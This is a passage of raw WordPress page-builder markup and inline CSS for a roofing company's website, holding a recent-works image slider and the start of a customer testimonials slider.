{\"block_id\":\"78c9592b-fe97-4617-9b42-3a70d0b149cd\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-78c9592b-fe97-4617-9b42-3a70d0b149cd\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"11786986-9ed9-4821-ad31-449ab6ed726b\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\"} -->\n<style type=\"text/css\"> .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"0c0b2954-7402-4523-850f-a32279216940\"} -->\n<style type=\"text/css\"> .block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-0c0b2954-7402-4523-850f-a32279216940 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-0c0b2954-7402-4523-850f-a32279216940 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7b7c381d-2ee6-49d3-980d-86ae77f3a19b\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy 